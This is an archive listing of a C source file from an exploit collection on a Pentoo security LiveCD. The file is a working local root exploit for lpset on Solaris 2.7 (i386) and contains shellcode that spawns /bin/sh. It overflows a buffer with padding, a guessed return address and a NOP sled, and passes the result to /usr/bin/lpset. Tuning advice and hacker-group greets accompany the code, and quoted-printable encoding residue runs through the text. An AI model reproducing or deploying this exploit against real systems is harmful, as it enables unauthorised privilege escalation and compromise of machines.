home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / lpset2-x86.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  65 lines

  1. /*=20 
  2.  *
  3.  * solaris 2.7 lpset local exploit, i386.
  4.  * discovered by: duke 
  5.  * not the same as on bt.
  6.  * if exploit dosen=B4t work try offset from 300-450
  7.  *
  8.  * greets: duke, #!ADM, #!security.is, #hax
  9.  *
  10.  * DiGiT - teddi@linux.is
  11.  *  
  12. */
  13.  
  14.     
  15. #include <unistd.h>
  16. #include <stdio.h> 
  17. #include <stdlib.h>
  18. #include <string.h> 
  19.  
  20. char shellcode[] =3D
  21.  "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
  22.  "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
  23.  "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
  24.  "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
  25.  "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
  26.  "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
  27.  
  28. long get_esp() { __asm__("movl %esp,%eax"); }
  29.  
  30. int main (int argc, char *argv[]) {
  31.  
  32.     long offset=3D410;
  33.     int nop=3D64;
  34.     int gab=3D40;
  35.     long addr;
  36.     char buffer[210];
  37.     int i, a, b;   
  38.  
  39. if (argc > 1) offset =3D strtol(argv[1], NULL, 0);
  40. if (argc > 2) gab =3D strtol(argv[2], NULL, 0);
  41. if (argc > 3) nop =3D strtol(argv[2], NULL, 0);
  42.  
  43.    for (a =3D 0; a <gab; a++)
  44.         buffer[a] =3D 'A';
  45.  
  46.   addr =3D get_esp() + offset;
  47.  
  48.   buffer[a++] =3D addr & 0x000000ff;
  49.   buffer[a++] =3D (addr & 0x0000ff00) >> 8;  
  50.   buffer[a++] =3D (addr & 0x00ff0000) >> 16;
  51.   buffer[a++] =3D (addr & 0xff000000) >> 24;
  52.  
  53.   for ( ; a < nop; a++)
  54.     buffer[a] =3D 0x90;
  55.     
  56.   for (b =3D 0; b < strlen(shellcode); b++, a++)
  57.     buffer[a] =3D shellcode[b];
  58.     
  59.   buffer[strlen(buffer)] =3D '\0';
  60.  
  61.         printf("addr =3D 0x%x\n", addr);
  62.         execl("/usr/bin/lpset", "lpset", "-n", "fns", "-r", buffer,"digit", NULL);
  63.    
  64. }       
  65.